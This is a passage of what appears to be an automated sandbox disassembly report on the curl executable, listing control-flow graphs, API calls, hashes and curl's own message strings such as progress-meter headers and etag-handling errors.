                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,?,?,?,?,?,0086184E), ref: 00862082
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,00000000,?,?,?,?,?,?,0086184E), ref: 008620CA
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00000000,?,?,?,?,?,?,0086184E), ref: 008620DD
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,out of memory,?,?,?,?,?,0086184E), ref: 008620F9
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,0086184E), ref: 0086211F
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,0086184E), ref: 0086212A
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0086216F
                                • _fdopen.API-MS-WIN-CRT-MATH-L1-1-0(00000000,008B7138,?,?,00000000,?,?,?,?,?,?,0086184E), ref: 0086219C
                                • _close.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,00000000,?,?,?,?,?,?,0086184E), ref: 008621AE
                                • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,008B7138,?,?,00000000,?,?,?,?,?,?,0086184E), ref: 008621BC
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,0086184E), ref: 008621CB
                                • strerror.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,?,?,?,?,0086184E), ref: 008621D3
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,Failed to open the file %s: %s,?,00000000,?,?,?,0086184E), ref: 008621EA
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,0086184E), ref: 008621F6
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: _errno$free$_close_fdopenfopenmallocstrerror
                                • String ID: %s/%s$0Lu@Ru@/Mu$Failed to open the file %s: %s$Remote filename has no length!$out of memory$overflow in filename generation
                                • API String ID: 2640482070-3504489054
                                • Opcode ID: c0fa1f05b20dbc746e478c92beca28cd42b053706f8ca870e8e1d619ccc08d0a
                                • Instruction ID: 126f8fa03d288060457de51006663ce31f6c8429683087eb03476e07c830d998
                                • Opcode Fuzzy Hash: c0fa1f05b20dbc746e478c92beca28cd42b053706f8ca870e8e1d619ccc08d0a
                                • Instruction Fuzzy Hash: DE61F170904B05AFCB109FA8DC459AEBBF8FF4A310F2586A9E551E7391E73599008B62

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 276 892f70-892f95 277 892fb8-892fcd call 891c9a 276->277 278 892f97-892f9e 276->278 284 89356d-893573 277->284 285 892fd3-892fe4 call 88a9f5 277->285 280 892fb0-892fb3 278->280 281 892fa0-892fa7 278->281 280->284 281->277 283 892fa9 281->283 283->280 288 893004-893023 call 891c1a 285->288 289 892fe6-893003 free 285->289 293 893045 288->293 294 893025-89303d call 8720e6 288->294 289->288 295 89304b-89307e call 890ca5 free 293->295 300 89312b-89312e 294->300 301 893043 294->301 295->284 303 893084-8930aa free 295->303 300->284 301->295 305 8930ac-8930bd call 88a9f5 303->305 306 8930d6-8930e7 call 88a9f5 303->306 305->306 313 8930bf-8930d4 call 8720e6 305->313 311 8930e9-8930ef 306->311 312 893133-893150 free 306->312 311->312 314 8930f1-893129 free call 8720e6 311->314 319 893151-893167 call 89206c 312->319 313->300 313->306 314->300 314->319 319->284 324 89316d-89319c call 88a9f5 call 892ca5 319->324 324->284 329 8931a2-8931af call 892b7a 324->329 329->284 332 8931b5-89320c call 8917ce call 87d208 call 87d26d 329->332 339 893562-893566 call 87d126 332->339 340 893212-893225 call 891eb9 332->340 343 89356b 339->343 340->339 345 89322b-893231 340->345 343->284 346 893271-893276 345->346 347 893233-893239 345->347 349 89327a-893281 346->349 347->346 348 89323b-89324e call 88a9f5 347->348 348->346 355 893250-893260 call 8903f2 348->355 351 893291 349->351 352 893283-89328f 349->352 354 893295-89329d 351->354 352->351 352->354 356 89329f-8932a2 354->356 357 8932b2 354->357 355->346 366 893262-89326f 355->366 356->357 360 8932a4-8932b0 356->360 358 8932b6-8932cf 357->358 361 8932d1-8932d4 358->361 362 8932e4 358->362 360->357 360->358 361->362 364 8932d6-8932e2 361->364 365 8932e8-8932ef 362->365 364->362 364->365 367 8932ff 365->367 368 8932f1-8932fd 365->368 366->349 369 893303-8933c7 call 87d26d free * 3 367->369 368->367 368->369 369->339 375 8933cd-8933d7 369->375 376 8933d9-8933e0 375->376 377 8933f8-89340b call 892995 375->377 376->377 378 8933e2-8933e9 376->378 383 89355a 377->383 384 893411-893420 call 891b0a 377->384 378->377 380 8933eb-8933f3 378->380 382 89355e 380->382 382->339 383->382 384->383 387 893426-893439 call 89187b 384->387 387->383 390 89343f-89344c 387->390 391 89344e-893451 390->391 392 893453-89345c call 88faf9 390->392 391->392 393 89345f-893469 call 892295 391->393 392->393 397 89346e-893474 393->397 397->383 398 89347a-893487 397->398 399 893489 398->399 400 8934b2-8934c2 398->400 401 89348b-89348e 399->401 402 893490-893496 399->402 403 89353f-893546 400->403 404 8934c4-8934e9 call 890211 400->404 401->400 401->402 402->400 406 893498 402->406 403->343 407 893548-89354f 403->407 404->403 412 8934eb-893524 call 87d632 404->412 409 89349a-8934a0 406->409 410 8934a2-8934a9 406->410 407->343 411 893551-893558 407->411 409->400 409->410 410->400 413 8934ab 410->413 411->343 416 893531-893533 412->416 413->400 417 893535 416->417 418 893526-89352c 416->418 417->403 419 89352e 418->419 420 893537-89353e call 88c9e4 418->420 419->416 420->403
                                APIs
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00892FFA
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00893075
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00893098
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00893105
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00893147
                                  • Part of subcall function 00892B7A: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00892BB8
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00893386
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008933A4
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008933BE
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: free
                                • String ID: HTTP/%s%s%s%s%s%s%s%s%s%s%s%s%s$%s $%s?%s$1.0$1.1$Accept$Accept-Encoding$Accept-Encoding: %s$Accept: */*$Proxy-Connection$Proxy-Connection: Keep-Alive$Referer$Referer: %s$User-Agent$upload completely sent off: %I64d out of %I64d bytes
                                • API String ID: 1294909896-3403769770
                                • Opcode ID: 06e5ffb1fa78bfb930cc86d30f395e93f4a5af74e3c3684b1c48263046de9ddf
                                • Instruction ID: 9cdc8bbec3d06c11251d0b592eecaa2299110b1500bcfbe511de9539598a043a
                                • Opcode Fuzzy Hash: 06e5ffb1fa78bfb930cc86d30f395e93f4a5af74e3c3684b1c48263046de9ddf
                                • Instruction Fuzzy Hash: 2A02B231704702AFDF19AB28D844B6AB7E1FF88324F18462DE859D7391DB31ED458B92

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 423 86dc15-86dc3d 424 86dcb0-86dcb3 423->424 425 86dc3f-86dc55 call 86375a 423->425 426 86dcc6-86dcd2 fopen 424->426 427 86dcb5-86dcbb 424->427 434 86dc57-86dc69 fopen 425->434 435 86dc81-86dc8f call 86db81 425->435 431 86dcd3-86dcdd 426->431 427->426 430 86dcbd-86dcc4 __acrt_iob_func 427->430 430->431 432 86e076 431->432 433 86dce3-86dcf2 431->433 439 86e078 432->439 436 86dcf5-86dd06 call 86e08f 433->436 437 86dc7a-86dc7f 434->437 438 86dc6b-86dc75 free 434->438 446 86dc91-86dca2 call 86db81 435->446 447 86dca8-86dcae 435->447 448 86e04e-86e061 call 870c88 __acrt_iob_func 436->448 449 86dd0c-86dd1e 436->449 437->433 442 86e089-86e08e 438->442 443 86e07f-86e086 free 439->443 443->442 446->432 446->447 447->433 458 86e063-86e06a fclose 448->458 459 86e06b-86e072 448->459 451 86e047 449->451 452 86dd24-86dd28 449->452 451->448 456 86dd53-86dd57 452->456 457 86dd2a-86dd3b call 870a91 452->457 461 86dd5c-86dd63 456->461 462 86dd59 456->462 465 86dd65-86dd6d 457->465 466 86dd3d-86dd4b 457->466 458->459 459->443 463 86e074 459->463 461->436 462->461 463->439 467 86dd6f-86dd75 465->467 468 86dd4d 465->468 466->457 466->468 467->468 469 86dd77-86dd7d 467->469 470 86dd50 468->470 469->468 471 86dd7f-86dd85 469->471 470->456 471->468 472 86dd87-86dd8f 471->472 472->470 473 86dd91-86dd99 472->473 474 86dd9c-86dda8 call 870a91 473->474 477 86ddc2-86ddc4 474->477 478 86ddaa-86ddad 474->478 481 86ddc6-86ddce 477->481 482 86de02-86de05 477->482 479 86ddaf-86ddb2 478->479 480 86ddb9-86ddc0 478->480 479->477 485 86ddb4-86ddb7 479->485 480->474 480->477 481->482 486 86ddd0 481->486 483 86de07-86de0a 482->483 484 86de85-86de89 482->484 487 86de0d-86de12 483->487 488 86df0f-86df13 484->488 489 86de8f-86de97 484->489 485->477 485->480 490 86ddd2-86ddda 486->490 487->487 493 86de14-86de25 malloc 487->493 494 86df16-86df3c call 8652d9 488->494 495 86dea5-86deaa 489->495 496 86de99-86dea3 489->496 491 86dddc-86dde6 490->491 492 86dde8-86dded 490->492 491->492 497 86ddf9-86de00 491->497 492->482 498 86ddef-86ddf2 492->498 493->451 499 86de2b-86de2f 493->499 508 86df3e-86df40 494->508 509 86df5c-86df5f 494->509 495->489 501 86deac-86deae 495->501 496->495 496->501 497->482 497->490 498->497 502 86ddf4-86ddf7 498->502 503 86de31-86de33 499->503 501->488 505 86deb0-86deb8 501->505 502->482 502->497 507 86de79-86de7b 503->507 505->488 506 86deba 505->506 512 86debc-86dec7 506->512 515 86de35-86de37 507->515 516 86de7d-86de80 507->516 510 86df46-86df48 508->510 511 86e025-86e029 508->511 513 86dfd2-86dfd5 509->513 514 86df61-86df69 509->514 510->511 517 86df4e-86df51 510->517 521 86e033-86e037 511->521 522 86e02b-86e032 free 511->522 518 86dee0-86dee2 512->518 519 86dec9-86ded5 512->519 523 86dfd8-86dfde 513->523 514->511 520 86df6f-86df73 514->520 515->516 524 86de39-86de3e 515->524 516->494 517->511 525 86df57-86df5a 517->525 518->488 527 86dee4-86dee6 518->527 519->518 526 86ded7-86dede 519->526 520->511 528 86df79-86df90 malloc 520->528 529 86e03f-86e042 521->529 530 86e039-86e03c 521->530 522->521 531 86dfe0-86dfe6 523->531 532 86dfed-86dff3 523->532 533 86de74-86de77 524->533 534 86de40-86de48 524->534 525->523 526->512 526->518 527->488 536 86dee8-86deea 527->536 537 86df92-86dfc8 call 8623fd 528->537 538 86dfca-86dfd0 528->538 529->461 530->529 531->532 539 86dfe8 531->539 532->511 535 86dff5-86dff8 532->535 533->507 534->507 540 86de4a-86de4d 534->540 535->511 541 86dffa-86dffd 535->541 536->488 542 86deec-86deee 536->542 537->511 538->523 539->532 544 86de4f-86de52 540->544 545 86de6c 540->545 541->511 548 86dfff-86e002 541->548 542->488 550 86def0-86df0c call 86913e 542->550 546 86de54-86de58 544->546 547 86de68-86de6a 544->547 549 86de6e-86de72 545->549 552 86de64-86de66 546->552 553 86de5a-86de5e 546->553 547->549 548->511 554 86e004-86e022 call 868bfc call 86913e 548->554 549->503 550->488 552->549 553->549 556 86de60-86de62 553->556 554->511 556->549
                                APIs
                                • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,008B7A20,?,00000000,00000000), ref: 0086DC5D
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,0086CE9B,?,0086901E,?), ref: 0086DC6C
                                • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000), ref: 0086DCBE
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 0086DE1A
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000310), ref: 0086DF7E
                                Strings
                                • _curlrc, xrefs: 0086DC94
                                • %s:%d: warning: '%s' %s, xrefs: 0086E012
                                • %s:%d: warning: '%s' uses unquoted whitespace in the line that may cause side-effects!, xrefs: 0086DEFC
                                • .curlrc, xrefs: 0086DC41
                                • <stdin>, xrefs: 0086DFE8
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: malloc$__acrt_iob_funcfopenfree
                                • String ID: %s:%d: warning: '%s' %s$%s:%d: warning: '%s' uses unquoted whitespace in the line that may cause side-effects!$.curlrc$<stdin>$_curlrc
                                • API String ID: 2899880627-1529230327
                                • Opcode ID: bc72cb855b76f9cc03df55cad1d2e903133c6d77ea7b227ec130d6c6fe901ad9
                                • Instruction ID: 926db6f09778ada6a3f3989a261448a012283e39ad624ccb251dc9604e1f533d
                                • Opcode Fuzzy Hash: bc72cb855b76f9cc03df55cad1d2e903133c6d77ea7b227ec130d6c6fe901ad9
                                • Instruction Fuzzy Hash: 0CE1CD74E003599FCB258FA884957FDBBF1FF5A300F2A409AD482EB351CA768945CB51

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 595 862230-862279 596 86228b-86228f 595->596 597 86227b-86227f call 861fdc 595->597 599 862291-862295 596->599 600 8622df-862305 _fileno _get_osfhandle _fileno _isatty 596->600 601 862284-862286 597->601 599->600 604 862297 599->604 602 862392-8623ac fwrite 600->602 603 86230b-86231a GetConsoleScreenBufferInfo 600->603 605 8622d7-8622da 601->605 606 862288 601->606 610 8623b5-8623bc 602->610 611 8623ae-8623b1 602->611 603->602 607 86231c-862341 MultiByteToWideChar malloc 603->607 608 8622a2-8622a9 604->608 609 862299-8622a0 604->609 614 8623ee-8623fc call 8b0ca6 605->614 606->596 607->605 615 862343-86235f MultiByteToWideChar 607->615 608->600 616 8622ab-8622b9 call 8b33b0 608->616 609->600 609->608 612 8623d0-8623d7 610->612 613 8623be-8623cb call 872378 610->613 611->610 619 8623eb 612->619 620 8623d9-8623e5 fflush 612->620 613->612 622 862386-86238d free 615->622 623 862361-862374 WriteConsoleW 615->623 616->600 628 8622bb-8622cc call 86913e 616->628 619->614 620->605 620->619 627 8622d6 622->627 623->622 626 862376-862384 free 623->626 626->611 627->605 628->627
                                APIs
                                • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 008622E2
                                • _get_osfhandle.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 008622E9
                                • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 008622F6
                                • _isatty.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 008622FD
                                • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?), ref: 00862312
                                • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(0000FDE9,00000000,?,?,00000000,00000000), ref: 0086232A
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00862336
                                • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(0000FDE9,00000000,?,?,00000000,?), ref: 00862354
                                • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00000000,?,00000000), ref: 0086236C
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00862377
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00862387
                                • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?), ref: 0086239E
                                • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 008623DC
                                Strings
                                • Binary output can mess up your terminal. Use "--output -" to tell curl to output it to your terminal anyway, or consider "--output <FILE>" to save to a file., xrefs: 008622BB
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: ByteCharConsoleMultiWide_filenofree$BufferInfoScreenWrite_get_osfhandle_isattyfflushfwritemalloc
                                • String ID: Binary output can mess up your terminal. Use "--output -" to tell curl to output it to your terminal anyway, or consider "--output <FILE>" to save to a file.
                                • API String ID: 4159644049-3734715646
                                • Opcode ID: 2b2520bdf0be93b45da581b65228441b9ea0221076662984104373395f5cdf55
                                • Instruction ID: e4668af677757b086790124ae2b3e476ba8a987f3b9898d92e40353a1f538be5
                                • Opcode Fuzzy Hash: 2b2520bdf0be93b45da581b65228441b9ea0221076662984104373395f5cdf55
                                • Instruction Fuzzy Hash: C4517D70A00B0AAFDB149FA8DD44BEEBBB9FF08314F144559E805E63A1DB749C40CB20

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 631 86a06f-86a085 fopen 632 86a0a7-86a0b3 call 86d323 631->632 633 86a087-86a08d 631->633 638 86a0b5-86a0b8 632->638 639 86a0db-86a0e6 call 8720e6 632->639 633->632 634 86a08f-86a0a5 call 869199 633->634 643 86a034-86a038 634->643 638->639 641 86a0ba-86a0d9 call 8720e6 free 638->641 648 86a0e9-86a0eb 639->648 641->648 646 86c5a8-86c5b1 643->646 649 86c5b7-86c5c1 call 869b4c 646->649 650 86c5b3-86c5b5 646->650 651 86a103-86a120 call 86d8d0 free 648->651 652 86a0ed-86a0ef 648->652 653 86c5c4-86c5d2 call 8b0ca6 649->653 650->649 650->653 664 86a122-86a129 fclose 651->664 665 86a12a-86a12e 651->665 656 86a0f1-86a0f8 fclose 652->656 657 86a0f9-86a0fe call 869199 652->657 656->657 667 86a032 657->667 664->665 666 86a134-86a142 665->666 665->667 669 86a144-86a147 666->669 670 86a1bc call 872235 666->670 667->643 671 86a15a-86a170 fopen 669->671 672 86a149-86a14f 669->672 677 86a1c1-86c596 call 8691ba call 8816ca 670->677 675 86a1a7-86a1b6 671->675 676 86a172-86a1a2 call 86913e free call 86fea5 671->676 672->671 674 86a151-86a158 call 861018 672->674 674->670 675->670 676->653 677->646 691 86c598-86c5a5 fclose 677->691 691->646
                                APIs
                                • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,008B7A20), ref: 0086A079
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,If-None-Match: %s,00000000), ref: 0086A0CD
                                • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 0086A0F2
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 0086A117
                                • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 0086A123
                                • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 0086C59E
                                Strings
                                • Failed to allocate memory for custom etag header, xrefs: 0086A0F9
                                • If-None-Match: %s, xrefs: 0086A0BD
                                • Failed to open %s, xrefs: 0086A095
                                • k%, xrefs: 0086A038
                                • If-None-Match: "", xrefs: 0086A0DB
                                • Failed creating file for saving etags: "%s". Skip this transfer, xrefs: 0086A173
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: fclose$free$fopen
                                • String ID: Failed creating file for saving etags: "%s". Skip this transfer$Failed to allocate memory for custom etag header$Failed to open %s$If-None-Match: ""$If-None-Match: %s$k%
                                • API String ID: 502121373-281841017
                                • Opcode ID: 00aa61614461a37f98aaedc20f6c6e8df2c5694d802f57ddea73a25f80ae705f
                                • Instruction ID: b7d037725d47af2d5c8106e6cc711cc8c4587dcf0d035ed7f7a88f18c415b4d3
                                • Opcode Fuzzy Hash: 00aa61614461a37f98aaedc20f6c6e8df2c5694d802f57ddea73a25f80ae705f
                                • Instruction Fuzzy Hash: 1251C031A04705CFCF299FA4DC59BAD7BB0FF06300F254169E846EA386EB7599418F12

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 694 88fd8c-88fdf2 call 8b3040 697 88fe3d-88fe3f 694->697 698 88fdf4-88fe04 694->698 699 88fef4-88ff18 697->699 700 88fe45-88fe53 697->700 701 88fe1b-88fe26 call 872119 698->701 702 88fe06-88fe18 call 872119 698->702 705 88ff1b-88ff1d 699->705 700->699 704 88fe59 700->704 708 88fe2b-88fe3c 701->708 702->701 709 88fe5b-88fe5d 704->709 710 88fe63-88fe83 call 8b3040 704->710 711 88ff23-88ff31 705->711 712 88ffd5-88fff0 705->712 708->697 709->699 709->710 724 88fec5-88fed7 710->724 725 88fe85 710->725 711->712 715 88ff37 711->715 713 88fff6-890002 712->713 716 89000d-890013 713->716 717 890004-890007 713->717 719 88ff39-88ff3b 715->719 720 88ff41-88ff64 call 8b3040 715->720 723 890015-890017 716->723 722 890009-89000b 717->722 717->723 719->712 719->720 732 88ffa9-88ffb8 720->732 733 88ff66 720->733 722->716 722->723 727 890019 723->727 728 89002b-89003c 723->728 729 88feb3-88feb9 724->729 730 88fe8f-88fea2 call 8b3040 725->730 731 88fe87-88fe8d 725->731 734 89001b-89001d 727->734 735 89001f-890029 727->735 736 890042-89006f call 86e2dd * 3 728->736 729->705 744 88fea8-88feb0 call 8b3040 730->744 731->730 737 88febb-88febd 731->737 732->713 739 88ff68-88ff6e 733->739 740 88ff70-88ff83 call 8b3040 733->740 734->728 734->735 735->736 767 89007f-890085 736->767 768 890071-89007d 736->768 737->724 741 88febf 737->741 739->740 745 88ff9f-88ffa1 739->745 757 88ff89-88ff9d call 8b3040 740->757 747 88fed9-88fef2 call 8b31d0 741->747 748 88fec1-88fec3 741->748 744->729 745->732 753 88ffa3 745->753 747->744 748->724 748->747 759 88ffba-88ffd3 call 8b31d0 753->759 760 88ffa5-88ffa7 753->760 757->713 759->757 760->732 760->759 769 89008b-89008d 767->769 768->769 770 89008f-8900b0 769->770 771 8900b2-8900c0 769->771 772 8900c3-8900de 770->772 771->772 773 8900e0 772->773 774 890125-890131 772->774 776 8900ea-8900fa call 8b3040 773->776 777 8900e2-8900e8 773->777 775 890137-8901ed call 86e127 * 6 call 872119 774->775 802 8901f2-890210 fflush call 8b0ca6 775->802 787 8900fd-890108 call 8b3040 776->787 777->776 779 89010a-89010c 777->779 779->774 781 89010e 779->781 784 890110-890112 781->784 785 890114-890123 call 8b31d0 781->785 784->774 784->785 785->787 787->775
                                APIs
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0088FDDF
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0088FE73
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0088FE95
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0088FEA8
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0088FF51
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0088FF76
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0088FF89
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008900F0
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008900FD
                                • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 008901FB
                                Strings
                                • %3I64d %s %3I64d %s %3I64d %s %s %s %s %s %s %s, xrefs: 008901E2
                                • %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed, xrefs: 0088FE1B
                                • ** Resuming transfer from byte position %I64d, xrefs: 0088FE08
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$fflush
                                • String ID: %3I64d %s %3I64d %s %3I64d %s %s %s %s %s %s %s$ %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed$** Resuming transfer from byte position %I64d
                                • API String ID: 1893817590-664487449
                                • Opcode ID: d0bb09cad42cca6d1f318f0ceeb09572e6545e3f9775a8b6ebd4be4898a35409
                                • Instruction ID: eb83d7258b3ac9d6a48db2489f6543f49f5ad7e7afb9b50e1193e78c4f486980
                                • Opcode Fuzzy Hash: d0bb09cad42cca6d1f318f0ceeb09572e6545e3f9775a8b6ebd4be4898a35409
                                • Instruction Fuzzy Hash: F5D16B71D04B09AFDB20AB68CC81BAAB7B9FF48300F14412DE65EA7252DB353D419F11

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1006 87760d-87764e 1007 877654-87765a 1006->1007 1008 87794f-877951 1006->1008 1007->1008 1009 877660-877666 1007->1009 1010 877952-877960 call 8b0ca6 1008->1010 1011 877670-877675 1009->1011 1012 877668 1009->1012 1015 8776e7-8776fc call 8791a5 1011->1015 1016 877677-877689 call 87752d 1011->1016 1014 87766a-87766b 1012->1014 1014->1010 1022 87770e-877714 1015->1022 1023 8776fe-877708 1015->1023 1024 87768b-87769b 1016->1024 1025 877716-877733 malloc 1022->1025 1026 877743-87774b 1022->1026 1023->1022 1027 8776af-8776b9 1024->1027 1028 87769d-8776a2 1024->1028 1046 877735-877737 1025->1046 1047 87773c 1025->1047 1032 877866-877886 WSAWaitForMultipleEvents 1026->1032 1033 877751-87775c 1026->1033 1030 8776c5-8776cc 1027->1030 1031 8776bb-8776c0 1027->1031 1028->1027 1029 8776a4-8776a9 1028->1029 1029->1027 1035 8776d4-8776df 1030->1035 1036 8776ce-8776d2 1030->1036 1031->1030 1040 8776c2-8776c3 1031->1040 1037 87791f-877932 WSAResetEvent 1032->1037 1038 87788c-87788f 1032->1038 1033->1032 1034 877762-877772 call 87752d 1033->1034 1050 877774-87778d 1034->1050 1035->1016 1044 8776e1 1035->1044 1036->1024 1036->1035 1042 877934-87794a free 1037->1042 1043 87794b-87794d 1037->1043 1045 877915-87791d 1038->1045 1040->1036 